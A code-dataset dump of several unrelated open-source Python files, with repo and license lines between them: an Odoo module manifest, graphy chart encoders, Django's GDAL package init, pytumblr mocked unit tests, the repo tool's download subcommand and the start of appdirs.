"AvanzOSC,"
"Tecnativa,"
"Joaquín Gutierrez",
'category': 'Purchase Management',
'website': 'http://www.odoomrp.com',
'summary': 'Purchase cost distribution',
'depends': [
'stock',
'purchase',
],
'data': [
'wizard/picking_import_wizard_view.xml',
'wizard/import_invoice_line_wizard_view.xml',
'wizard/import_landed_cost_pickings_wizard_view.xml',
'views/account_invoice_view.xml',
'views/purchase_cost_distribution_view.xml',
'views/purchase_cost_distribution_line_expense_view.xml',
'views/purchase_expense_type_view.xml',
'views/purchase_order_view.xml',
'views/stock_picking_view.xml',
'data/purchase_cost_distribution_sequence.xml',
'security/purchase_landed_cost_security.xml',
'security/ir.model.access.csv',
],
'installable': True,
'images': [
'/static/description/images/purchase_order_expense_main.png',
'/static/description/images/purchase_order_expense_line.png',
'/static/description/images/expenses_types.png',
],
}
|
agpl-3.0
|
renanrodm/namebench
|
nb_third_party/graphy/backends/google_chart_api/encoders.py
|
230
|
14800
|
#!/usr/bin/python2.4
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Display objects for the different kinds of charts.
Not intended for end users, use the methods in __init__ instead."""
import warnings
from graphy.backends.google_chart_api import util
class BaseChartEncoder(object):
"""Base class for encoders which turn chart objects into Google Chart URLS.
Object attributes:
extra_params: Dict to add/override specific chart params. Of the
form param:string, passed directly to the Google Chart API.
For example, 'cht':'lti' becomes ?cht=lti in the URL.
url_base: The prefix to use for URLs. If you want to point to a different
server for some reason, you would override this.
formatters: TODO: Need to explain how these work, and how they are
different from chart formatters.
enhanced_encoding: If True, uses enhanced encoding. If
False, simple encoding is used.
escape_url: If True, URL will be properly escaped. If False, characters
                like | and , will be unescaped (which makes the URL easier to
read).
"""
def __init__(self, chart):
self.extra_params = {} # You can add specific params here.
self.url_base = 'http://chart.apis.google.com/chart'
self.formatters = self._GetFormatters()
self.chart = chart
self.enhanced_encoding = False
self.escape_url = True # You can turn off URL escaping for debugging.
self._width = 0 # These are set when someone calls Url()
self._height = 0
def Url(self, width, height, use_html_entities=False):
"""Get the URL for our graph.
Args:
use_html_entities: If True, reserved HTML characters (&, <, >, ") in the
URL are replaced with HTML entities (&, <, etc.). Default is False.
"""
self._width = width
self._height = height
params = self._Params(self.chart)
return util.EncodeUrl(self.url_base, params, self.escape_url,
use_html_entities)
def Img(self, width, height):
"""Get an image tag for our graph."""
url = self.Url(width, height, use_html_entities=True)
tag = '<img src="%s" width="%s" height="%s" alt="chart"/>'
return tag % (url, width, height)
def _GetType(self, chart):
"""Return the correct chart_type param for the chart."""
raise NotImplementedError
def _GetFormatters(self):
"""Get a list of formatter functions to use for encoding."""
formatters = [self._GetLegendParams,
self._GetDataSeriesParams,
self._GetColors,
self._GetAxisParams,
self._GetGridParams,
self._GetType,
self._GetExtraParams,
self._GetSizeParams,
]
return formatters
def _Params(self, chart):
"""Collect all the different params we need for the URL. Collecting
all params as a dict before converting to a URL makes testing easier.
"""
chart = chart.GetFormattedChart()
params = {}
def Add(new_params):
params.update(util.ShortenParameterNames(new_params))
for formatter in self.formatters:
Add(formatter(chart))
for key in params:
params[key] = str(params[key])
return params
def _GetSizeParams(self, chart):
"""Get the size param."""
return {'size': '%sx%s' % (int(self._width), int(self._height))}
def _GetExtraParams(self, chart):
"""Get any extra params (from extra_params)."""
return self.extra_params
def _GetDataSeriesParams(self, chart):
"""Collect params related to the data series."""
y_min, y_max = chart.GetDependentAxis().min, chart.GetDependentAxis().max
series_data = []
markers = []
for i, series in enumerate(chart.data):
data = series.data
if not data: # Drop empty series.
continue
series_data.append(data)
for x, marker in series.markers:
args = [marker.shape, marker.color, i, x, marker.size]
markers.append(','.join(str(arg) for arg in args))
encoder = self._GetDataEncoder(chart)
result = util.EncodeData(chart, series_data, y_min, y_max, encoder)
result.update(util.JoinLists(marker = markers))
return result
def _GetColors(self, chart):
"""Color series color parameter."""
colors = []
for series in chart.data:
if not series.data:
continue
colors.append(series.style.color)
return util.JoinLists(color = colors)
def _GetDataEncoder(self, chart):
"""Get a class which can encode the data the way the user requested."""
if not self.enhanced_encoding:
return util.SimpleDataEncoder()
return util.EnhancedDataEncoder()
def _GetLegendParams(self, chart):
"""Get params for showing a legend."""
if chart._show_legend:
return util.JoinLists(data_series_label = chart._legend_labels)
return {}
def _GetAxisLabelsAndPositions(self, axis, chart):
"""Return axis.labels & axis.label_positions."""
return axis.labels, axis.label_positions
def _GetAxisParams(self, chart):
"""Collect params related to our various axes (x, y, right-hand)."""
axis_types = []
axis_ranges = []
axis_labels = []
axis_label_positions = []
axis_label_gridlines = []
mark_length = max(self._width, self._height)
for i, axis_pair in enumerate(a for a in chart._GetAxes() if a[1].labels):
axis_type_code, axis = axis_pair
axis_types.append(axis_type_code)
if axis.min is not None or axis.max is not None:
assert axis.min is not None # Sanity check: both min & max must be set.
assert axis.max is not None
axis_ranges.append('%s,%s,%s' % (i, axis.min, axis.max))
labels, positions = self._GetAxisLabelsAndPositions(axis, chart)
if labels:
axis_labels.append('%s:' % i)
axis_labels.extend(labels)
if positions:
positions = [i] + list(positions)
axis_label_positions.append(','.join(str(x) for x in positions))
if axis.label_gridlines:
axis_label_gridlines.append("%d,%d" % (i, -mark_length))
return util.JoinLists(axis_type = axis_types,
axis_range = axis_ranges,
axis_label = axis_labels,
axis_position = axis_label_positions,
axis_tick_marks = axis_label_gridlines,
)
def _GetGridParams(self, chart):
"""Collect params related to grid lines."""
x = 0
y = 0
if chart.bottom.grid_spacing:
# min/max must be set for this to make sense.
assert(chart.bottom.min is not None)
assert(chart.bottom.max is not None)
total = float(chart.bottom.max - chart.bottom.min)
x = 100 * chart.bottom.grid_spacing / total
if chart.left.grid_spacing:
# min/max must be set for this to make sense.
assert(chart.left.min is not None)
assert(chart.left.max is not None)
total = float(chart.left.max - chart.left.min)
y = 100 * chart.left.grid_spacing / total
if x or y:
return dict(grid = '%.3g,%.3g,1,0' % (x, y))
return {}
class LineChartEncoder(BaseChartEncoder):
"""Helper class to encode LineChart objects into Google Chart URLs."""
def _GetType(self, chart):
return {'chart_type': 'lc'}
def _GetLineStyles(self, chart):
"""Get LineStyle parameters."""
styles = []
for series in chart.data:
style = series.style
if style:
styles.append('%s,%s,%s' % (style.width, style.on, style.off))
else:
# If one style is missing, they must all be missing
# TODO: Add a test for this; throw a more meaningful exception
assert (not styles)
return util.JoinLists(line_style = styles)
def _GetFormatters(self):
out = super(LineChartEncoder, self)._GetFormatters()
out.insert(-2, self._GetLineStyles)
return out
class SparklineEncoder(LineChartEncoder):
"""Helper class to encode Sparkline objects into Google Chart URLs."""
def _GetType(self, chart):
return {'chart_type': 'lfi'}
class BarChartEncoder(BaseChartEncoder):
"""Helper class to encode BarChart objects into Google Chart URLs."""
__STYLE_DEPRECATION = ('BarChart.display.style is deprecated.' +
' Use BarChart.style, instead.')
def __init__(self, chart, style=None):
"""Construct a new BarChartEncoder.
Args:
style: DEPRECATED. Set style on the chart object itself.
"""
super(BarChartEncoder, self).__init__(chart)
if style is not None:
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
chart.style = style
def _GetType(self, chart):
# Vertical Stacked Type
types = {(True, False): 'bvg',
(True, True): 'bvs',
(False, False): 'bhg',
(False, True): 'bhs'}
return {'chart_type': types[(chart.vertical, chart.stacked)]}
def _GetAxisLabelsAndPositions(self, axis, chart):
"""Reverse labels on the y-axis in horizontal bar charts.
(Otherwise the labels come out backwards from what you would expect)
"""
if not chart.vertical and axis == chart.left:
# The left axis of horizontal bar charts needs to have reversed labels
return reversed(axis.labels), reversed(axis.label_positions)
return axis.labels, axis.label_positions
def _GetFormatters(self):
out = super(BarChartEncoder, self)._GetFormatters()
# insert at -2 to allow extra_params to overwrite everything
out.insert(-2, self._ZeroPoint)
out.insert(-2, self._ApplyBarChartStyle)
return out
def _ZeroPoint(self, chart):
"""Get the zero-point if any bars are negative."""
# (Maybe) set the zero point.
min, max = chart.GetDependentAxis().min, chart.GetDependentAxis().max
out = {}
if min < 0:
if max < 0:
out['chp'] = 1
else:
out['chp'] = -min/float(max - min)
return out
def _ApplyBarChartStyle(self, chart):
"""If bar style is specified, fill in the missing data and apply it."""
# sanity checks
if chart.style is None or not chart.data:
return {}
(bar_thickness, bar_gap, group_gap) = (chart.style.bar_thickness,
chart.style.bar_gap,
chart.style.group_gap)
# Auto-size bar/group gaps
if bar_gap is None and group_gap is not None:
bar_gap = max(0, group_gap / 2)
if not chart.style.use_fractional_gap_spacing:
bar_gap = int(bar_gap)
if group_gap is None and bar_gap is not None:
group_gap = max(0, bar_gap * 2)
# Set bar thickness to auto if it is missing
if bar_thickness is None:
if chart.style.use_fractional_gap_spacing:
bar_thickness = 'r'
else:
bar_thickness = 'a'
else:
# Convert gap sizes to pixels if needed
if chart.style.use_fractional_gap_spacing:
if bar_gap:
bar_gap = int(bar_thickness * bar_gap)
if group_gap:
group_gap = int(bar_thickness * group_gap)
# Build a valid spec; ignore group gap if chart is stacked,
# since there are no groups in that case
spec = [bar_thickness]
if bar_gap is not None:
spec.append(bar_gap)
if group_gap is not None and not chart.stacked:
spec.append(group_gap)
return util.JoinLists(bar_size = spec)
def __GetStyle(self):
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
return self.chart.style
def __SetStyle(self, value):
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
self.chart.style = value
style = property(__GetStyle, __SetStyle, __STYLE_DEPRECATION)
class PieChartEncoder(BaseChartEncoder):
"""Helper class for encoding PieChart objects into Google Chart URLs.
Object Attributes:
is3d: if True, draw a 3d pie chart. Default is False.
"""
def __init__(self, chart, is3d=False, angle=None):
"""Construct a new PieChartEncoder.
Args:
is3d: If True, draw a 3d pie chart. Default is False. If the pie chart
includes multiple pies, is3d must be set to False.
angle: Angle of rotation of the pie chart, in radians.
"""
super(PieChartEncoder, self).__init__(chart)
self.is3d = is3d
    self.angle = angle
def _GetFormatters(self):
"""Add a formatter for the chart angle."""
formatters = super(PieChartEncoder, self)._GetFormatters()
formatters.append(self._GetAngleParams)
return formatters
def _GetType(self, chart):
if len(chart.data) > 1:
if self.is3d:
warnings.warn(
'3d charts with more than one pie not supported; rendering in 2d',
RuntimeWarning, stacklevel=2)
chart_type = 'pc'
else:
if self.is3d:
chart_type = 'p3'
else:
chart_type = 'p'
return {'chart_type': chart_type}
def _GetDataSeriesParams(self, chart):
"""Collect params related to the data series."""
pie_points = []
labels = []
max_val = 1
for pie in chart.data:
points = []
for segment in pie:
if segment:
points.append(segment.size)
max_val = max(max_val, segment.size)
labels.append(segment.label or '')
if points:
pie_points.append(points)
encoder = self._GetDataEncoder(chart)
result = util.EncodeData(chart, pie_points, 0, max_val, encoder)
result.update(util.JoinLists(label=labels))
return result
def _GetColors(self, chart):
if chart._colors:
# Colors were overridden by the user
colors = chart._colors
else:
# Build the list of colors from individual segments
colors = []
for pie in chart.data:
for segment in pie:
if segment and segment.color:
colors.append(segment.color)
return util.JoinLists(color = colors)
def _GetAngleParams(self, chart):
"""If the user specified an angle, add it to the params."""
if self.angle:
return {'chp' : str(self.angle)}
return {}
|
apache-2.0
|
tayfun/django
|
django/contrib/gis/gdal/__init__.py
|
327
|
2635
|
"""
This module houses ctypes interfaces for GDAL objects. The following GDAL
objects are supported:
CoordTransform: Used for coordinate transformations from one spatial
reference system to another.
Driver: Wraps an OGR data source driver.
DataSource: Wrapper for the OGR data source object, supports
OGR-supported data sources.
Envelope: A ctypes structure for bounding boxes (GDAL library
not required).
OGRGeometry: Object for accessing OGR Geometry functionality.
OGRGeomType: A class for representing the different OGR Geometry
types (GDAL library not required).
SpatialReference: Represents OSR Spatial Reference objects.
The GDAL library will be imported from the system path using the default
library name for the current OS. The default library path may be overridden
by setting `GDAL_LIBRARY_PATH` in your settings with the path to the GDAL C
library on your system.
GDAL links to a large number of external libraries that consume RAM when
loaded. Thus, it may be desirable to disable GDAL on systems with limited
RAM resources -- this may be accomplished by setting `GDAL_LIBRARY_PATH`
to a non-existent file location (e.g., `GDAL_LIBRARY_PATH='/null/path'`;
setting to None/False/'' will not work as a string must be given).
"""
from django.contrib.gis.gdal.error import ( # NOQA
GDALException, OGRException, OGRIndexError, SRSException, check_err,
)
from django.contrib.gis.gdal.geomtype import OGRGeomType # NOQA
__all__ = [
'check_err', 'GDALException', 'OGRException', 'OGRIndexError',
'SRSException', 'OGRGeomType', 'HAS_GDAL',
]
# Attempting to import objects that depend on the GDAL library. The
# HAS_GDAL flag will be set to True if the library is present on
# the system.
try:
from django.contrib.gis.gdal.driver import Driver # NOQA
from django.contrib.gis.gdal.datasource import DataSource # NOQA
from django.contrib.gis.gdal.libgdal import gdal_version, gdal_full_version, GDAL_VERSION # NOQA
from django.contrib.gis.gdal.raster.source import GDALRaster # NOQA
from django.contrib.gis.gdal.srs import SpatialReference, CoordTransform # NOQA
from django.contrib.gis.gdal.geometries import OGRGeometry # NOQA
HAS_GDAL = True
__all__ += [
'Driver', 'DataSource', 'gdal_version', 'gdal_full_version',
'GDALRaster', 'GDAL_VERSION', 'SpatialReference', 'CoordTransform',
'OGRGeometry',
]
except GDALException:
HAS_GDAL = False
try:
from django.contrib.gis.gdal.envelope import Envelope
__all__ += ['Envelope']
except ImportError:
# No ctypes, but don't raise an exception.
pass
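# Usage sketch (editor's addition, not part of Django): downstream code is
# expected to guard GDAL-dependent work behind HAS_GDAL so this package still
# imports cleanly when libgdal is absent. The WKT below is an illustrative
# value only.
#
#   from django.contrib.gis.gdal import HAS_GDAL
#   if HAS_GDAL:
#       from django.contrib.gis.gdal import OGRGeometry
#       geom = OGRGeometry('POINT (1 2)')
#       print(geom.geom_type, geom.wkt)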
|
bsd-3-clause
|
socrateslee/pytumblr
|
tests/test_pytumblr.py
|
1
|
12769
|
from __future__ import unicode_literals
from future import standard_library
standard_library.install_aliases()
import unittest
import mock
import json
import pytumblr
from urllib.parse import parse_qs
import sys
if sys.version_info < (2, 7):
# python 2.6 may show ssl warnings, which we don't care about for these tests
import urllib3
urllib3.disable_warnings()
def wrap_response(response_text):
def inner(*args, **kwargs):
mp = mock.MagicMock()
mp.json.return_value = json.loads(response_text)
return mp
return inner
def wrap_response_storing_data(response_text, store):
def inner(*args, **kwargs):
# store data for assertion on input
store.data = kwargs.get('data')
mp = mock.MagicMock()
mp.json.return_value = json.loads(response_text)
return mp
return inner
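# Usage pattern for the helpers above (editor's note): each test below patches
# requests.get/requests.post and installs one of these factories as the mock's
# side_effect, so client calls parse canned JSON instead of hitting the network.
# wrap_response_storing_data additionally captures the posted form body on the
# mock itself, which the tests then check with parse_qs(mock_post.data).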
class TumblrRestClientTest(unittest.TestCase):
"""
"""
def setUp(self):
with open('tests/tumblr_credentials.json', 'r') as f:
credentials = json.loads(f.read())
self.client = pytumblr.TumblrRestClient(credentials['consumer_key'], credentials['consumer_secret'], credentials['oauth_token'], credentials['oauth_token_secret'])
@mock.patch('requests.get')
def test_dashboard(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"posts": [] } }')
response = self.client.dashboard()
assert response['posts'] == []
@mock.patch('requests.get')
def test_posts(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"posts": [] } }')
response = self.client.posts('codingjester.tumblr.com')
assert response['posts'] == []
@mock.patch('requests.get')
def test_posts_with_type(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"posts": [] } }')
response = self.client.posts('seejohnrun', 'photo')
assert response['posts'] == []
@mock.patch('requests.get')
def test_posts_with_type_and_arg(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"posts": [] } }')
args = {'limit': 1}
response = self.client.posts('seejohnrun', 'photo', **args)
assert response['posts'] == []
@mock.patch('requests.get')
def test_blogInfo(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"blog": {} } }')
response = self.client.blog_info('codingjester.tumblr.com')
assert response['blog'] == {}
@mock.patch('requests.get')
def test_avatar_with_301(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 301, "msg": "Moved Permanently"}, "response": {"avatar_url": "" } }')
response = self.client.avatar('staff.tumblr.com')
assert response['avatar_url'] == ''
@mock.patch('requests.get')
def test_avatar_with_302(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 302, "msg": "Found"}, "response": {"avatar_url": "" } }')
response = self.client.avatar('staff.tumblr.com')
assert response['avatar_url'] == ''
@mock.patch('requests.get')
def test_followers(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"users": [] } }')
response = self.client.followers('codingjester.tumblr.com')
assert response['users'] == []
@mock.patch('requests.get')
def test_blog_following(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"blogs": [], "total_blogs": 1}}')
response = self.client.blog_following('pytblr.tumblr.com')
assert response['blogs'] == []
@mock.patch('requests.get')
def test_blogLikes(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"liked_posts": [] } }')
response = self.client.blog_likes('codingjester.tumblr.com')
assert response['liked_posts'] == []
@mock.patch('requests.get')
def test_blogLikes_with_after(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"liked_posts": [] } }')
response = self.client.blog_likes('codingjester.tumblr.com', after=1418684291)
assert response['liked_posts'] == []
@mock.patch('requests.get')
def test_blogLikes_with_before(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"liked_posts": [] } }')
response = self.client.blog_likes('codingjester.tumblr.com', before=1418684291)
assert response['liked_posts'] == []
@mock.patch('requests.get')
def test_queue(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"posts": [] } }')
response = self.client.queue('codingjester.tumblr.com')
assert response['posts'] == []
@mock.patch('requests.get')
def test_drafts(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"posts": [] } }')
response = self.client.drafts('codingjester.tumblr.com')
assert response['posts'] == []
@mock.patch('requests.get')
def test_submissions(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"posts": [] } }')
response = self.client.submission('codingjester.tumblr.com')
assert response['posts'] == []
@mock.patch('requests.post')
def test_follow(self, mock_post):
mock_post.side_effect = wrap_response_storing_data(
'{"meta": {"status": 200, "msg": "OK"}, "response": []}',
mock_post)
response = self.client.follow("codingjester.tumblr.com")
assert response == []
assert parse_qs(mock_post.data) == parse_qs('url=codingjester.tumblr.com')
@mock.patch('requests.post')
def test_unfollow(self, mock_post):
mock_post.side_effect = wrap_response_storing_data(
'{"meta": {"status": 200, "msg": "OK"}, "response": []}',
mock_post)
response = self.client.unfollow("codingjester.tumblr.com")
assert response == []
assert parse_qs(mock_post.data) == parse_qs('url=codingjester.tumblr.com')
@mock.patch('requests.post')
def test_reblog(self, mock_post):
mock_post.side_effect = wrap_response_storing_data(
'{"meta": {"status": 200, "msg": "OK"}, "response": []}',
mock_post)
response = self.client.reblog('seejohnrun', id='123', reblog_key="adsfsadf", state='coolguy', tags=['hello', 'world'])
assert response == []
assert parse_qs(mock_post.data) == parse_qs('state=coolguy&reblog_key=adsfsadf&id=123&tags=hello%2Cworld')
@mock.patch('requests.post')
def test_edit_post(self, mock_post):
mock_post.side_effect = wrap_response_storing_data(
'{"meta": {"status": 200, "msg": "OK"}, "response": []}',
mock_post)
response = self.client.edit_post('seejohnrun', id='123', state='coolguy', tags=['hello', 'world'])
assert response == []
assert parse_qs(mock_post.data) == parse_qs('state=coolguy&id=123&tags=hello%2Cworld')
@mock.patch('requests.post')
def test_like(self, mock_post):
mock_post.side_effect = wrap_response_storing_data(
'{"meta": {"status": 200, "msg": "OK"}, "response": []}',
mock_post)
response = self.client.like('123', "adsfsadf")
assert response == []
assert parse_qs(mock_post.data) == parse_qs('id=123&reblog_key=adsfsadf')
@mock.patch('requests.post')
def test_unlike(self, mock_post):
mock_post.side_effect = wrap_response_storing_data(
'{"meta": {"status": 200, "msg": "OK"}, "response": []}',
mock_post)
response = self.client.unlike('123', "adsfsadf")
assert response == []
assert parse_qs(mock_post.data) == parse_qs('id=123&reblog_key=adsfsadf')
@mock.patch('requests.get')
def test_info(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": []}')
response = self.client.info()
assert response == []
@mock.patch('requests.get')
def test_likes(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": []}')
response = self.client.likes()
assert response == []
@mock.patch('requests.get')
def test_likes_with_after(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": []}')
response = self.client.likes(after=1418684291)
assert response == []
@mock.patch('requests.get')
def test_likes_with_before(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": []}')
response = self.client.likes(before=1418684291)
assert response == []
@mock.patch('requests.get')
def test_following(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": []}')
response = self.client.following()
assert response == []
@mock.patch('requests.get')
def test_tagged(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": []}')
response = self.client.tagged('food')
assert response == []
@mock.patch('requests.post')
def test_create_text(self, mock_post):
mock_post.side_effect = wrap_response('{"meta": {"status": 201, "msg": "OK"}, "response": []}')
response = self.client.create_text('codingjester.tumblr.com', body="Testing")
assert response == []
@mock.patch('requests.post')
def test_create_link(self, mock_post):
mock_post.side_effect = wrap_response_storing_data(
'{"meta": {"status": 201, "msg": "OK"}, "response": []}',
mock_post)
response = self.client.create_link('codingjester.tumblr.com', url="https://google.com", tags=['omg', 'nice'])
assert response == []
assert parse_qs(mock_post.data) == parse_qs('url=https%3A%2F%2Fgoogle.com&type=link&tags=omg%2Cnice')
@mock.patch('requests.post')
def test_no_tags(self, mock_post):
mock_post.side_effect = wrap_response_storing_data(
'{"meta": {"status": 201, "msg": "OK"}, "response": []}',
mock_post)
self.client.create_link('seejohnrun.tumblr.com', tags=[])
assert parse_qs(mock_post.data) == parse_qs('type=link&tags=')
@mock.patch('requests.post')
def test_create_quote(self, mock_post):
mock_post.side_effect = wrap_response('{"meta": {"status": 201, "msg": "OK"}, "response": []}')
response = self.client.create_quote('codingjester.tumblr.com', quote="It's better to love and lost, than never have loved at all.")
assert response == []
@mock.patch('requests.post')
def test_create_chat(self, mock_post):
mock_post.side_effect = wrap_response('{"meta": {"status": 201, "msg": "OK"}, "response": []}')
response = self.client.create_chat('codingjester.tumblr.com', conversation="JB: Testing is rad.\nJC: Hell yeah.")
assert response == []
@mock.patch('requests.post')
def test_create_photo(self, mock_post):
mock_post.side_effect = wrap_response('{"meta": {"status": 201, "msg": "OK"}, "response": []}')
response = self.client.create_photo('codingjester.tumblr.com', source="https://media.tumblr.com/image.jpg")
assert response == []
@mock.patch('requests.post')
def test_create_audio(self, mock_post):
mock_post.side_effect = wrap_response('{"meta": {"status": 201, "msg": "OK"}, "response": []}')
response = self.client.create_audio('codingjester.tumblr.com', external_url="https://media.tumblr.com/audio.mp3")
assert response == []
@mock.patch('requests.post')
def test_create_video(self, mock_post):
mock_post.side_effect = wrap_response('{"meta": {"status": 201, "msg": "OK"}, "response": []}')
response = self.client.create_video('codingjester.tumblr.com', embed="blahblahembed")
assert response == []
if __name__ == "__main__":
unittest.main()
|
apache-2.0
|
nuclearmistake/repo
|
subcmds/download.py
|
3
|
3325
|
#
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import re
import sys
from command import Command
from error import GitError
CHANGE_RE = re.compile(r'^([1-9][0-9]*)(?:[/\.-]([1-9][0-9]*))?$')
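# Accepted change identifiers (editor's note, values illustrative): CHANGE_RE
# matches a bare change number or a change/patchset pair separated by '/', '.'
# or '-', e.g.
#   "12345"                         -> change 12345, patchset defaults to 1
#   "12345/6", "12345.6", "12345-6" -> change 12345, patchset 6
# Leading zeros are rejected by the [1-9][0-9]* groups.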
class Download(Command):
common = True
helpSummary = "Download and checkout a change"
helpUsage = """
%prog {[project] change[/patchset]}...
"""
helpDescription = """
The '%prog' command downloads a change from the review system and
makes it available in your project's local working directory.
If no project is specified, the current directory is used as the project.
"""
def _Options(self, p):
p.add_option('-c', '--cherry-pick',
dest='cherrypick', action='store_true',
help="cherry-pick instead of checkout")
p.add_option('-r', '--revert',
dest='revert', action='store_true',
help="revert instead of checkout")
p.add_option('-f', '--ff-only',
dest='ffonly', action='store_true',
help="force fast-forward merge")
def _ParseChangeIds(self, args):
if not args:
self.Usage()
to_get = []
project = None
for a in args:
m = CHANGE_RE.match(a)
if m:
if not project:
project = self.GetProjects(".")[0]
chg_id = int(m.group(1))
if m.group(2):
ps_id = int(m.group(2))
else:
ps_id = 1
to_get.append((project, chg_id, ps_id))
else:
project = self.GetProjects([a])[0]
return to_get
def Execute(self, opt, args):
for project, change_id, ps_id in self._ParseChangeIds(args):
dl = project.DownloadPatchSet(change_id, ps_id)
if not dl:
print('[%s] change %d/%d not found'
% (project.name, change_id, ps_id),
file=sys.stderr)
sys.exit(1)
if not opt.revert and not dl.commits:
print('[%s] change %d/%d has already been merged'
% (project.name, change_id, ps_id),
file=sys.stderr)
continue
if len(dl.commits) > 1:
print('[%s] %d/%d depends on %d unmerged changes:' \
% (project.name, change_id, ps_id, len(dl.commits)),
file=sys.stderr)
for c in dl.commits:
print(' %s' % (c), file=sys.stderr)
if opt.cherrypick:
try:
project._CherryPick(dl.commit)
except GitError:
print('[%s] Could not complete the cherry-pick of %s' \
% (project.name, dl.commit), file=sys.stderr)
sys.exit(1)
elif opt.revert:
project._Revert(dl.commit)
elif opt.ffonly:
project._FastForward(dl.commit, ffonly=True)
else:
project._Checkout(dl.commit)
|
apache-2.0
|
pradyunsg/pip
|
src/pip/_vendor/appdirs.py
|
22
|
25907
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2005-2010 ActiveState Software Inc.
# Copyright (c) 2013 Eddy Petrișor
"""Utilities for determining application-specific dirs.
See <http://github.com/ActiveState/appdirs> for details and usage.
"""
# Dev Notes:
# - MSDN on where to store app data files:
# http://support.microsoft.com/default.aspx?scid=kb;en-us;310294#XSLTH3194121123120121120120
# - Mac OS X: http://developer.apple.com/documentation/MacOSX/Conceptual/BPFileSystem/index.html
# - XDG spec for Un*x: http://standards.freedesktop.org/basedir-spec/basedir-spec-latest.html
__version__ = "1.4.4"
__version_info__ = tuple(int(segment) for segment in __version__.split("."))
import sys
import os
PY3 = sys.version_info[0] == 3
if PY3:
unicode = str
if sys.platform.startswith('java'):
import platform
os_name = platform.java_ver()[3][0]
if os_name.startswith('Windows'): # "Windows XP", "Windows 7", etc.
system = 'win32'
elif os_name.startswith('Mac'): # "Mac OS X", etc.
system = 'darwin'
else: # "Linux", "SunOS", "FreeBSD", etc.
# Setting this to "linux2" is not ideal, but only Windows or Mac
# are actually checked for and the rest of the module expects
# *sys.platform* style strings.
system = 'linux2'
elif sys.platform == 'cli' and os.name == 'nt':
# Detect Windows in IronPython to match pip._internal.utils.compat.WINDOWS
# Discussion: <https://github.com/pypa/pip/pull/7501>
system = 'win32'
else:
system = sys.platform
def user_data_dir(appname=None, appauthor=None, version=None, roaming=False):
r"""Return full path to the user-specific data dir for this application.
"appname" is the name of application.
If None, just the system directory is returned.
"appauthor" (only used on Windows) is the name of the
appauthor or distributing body for this application. Typically
it is the owning company name. This falls back to appname. You may
pass False to disable it.
"version" is an optional version path element to append to the
path. You might want to use this if you want multiple versions
of your app to be able to run independently. If used, this
would typically be "<major>.<minor>".
Only applied when appname is present.
"roaming" (boolean, default False) can be set True to use the Windows
roaming appdata directory. That means that for users on a Windows
network setup for roaming profiles, this user data will be
sync'd on login. See
<http://technet.microsoft.com/en-us/library/cc766489(WS.10).aspx>
for a discussion of issues.
Typical user data directories are:
Mac OS X: ~/Library/Application Support/<AppName> # or ~/.config/<AppName>, if the other does not exist
Unix: ~/.local/share/<AppName> # or in $XDG_DATA_HOME, if defined
Win XP (not roaming): C:\Documents and Settings\<username>\Application Data\<AppAuthor>\<AppName>
Win XP (roaming): C:\Documents and Settings\<username>\Local Settings\Application Data\<AppAuthor>\<AppName>
Win 7 (not roaming): C:\Users\<username>\AppData\Local\<AppAuthor>\<AppName>
Win 7 (roaming): C:\Users\<username>\AppData\Roaming\<AppAuthor>\<AppName>
For Unix, we follow the XDG spec and support $XDG_DATA_HOME.
That means, by default "~/.local/share/<AppName>".
"""
if system == "win32":
if appauthor is None:
appauthor = appname
const = roaming and "CSIDL_APPDATA" or "CSIDL_LOCAL_APPDATA"
path = os.path.normpath(_get_win_folder(const))
if appname:
if appauthor is not False:
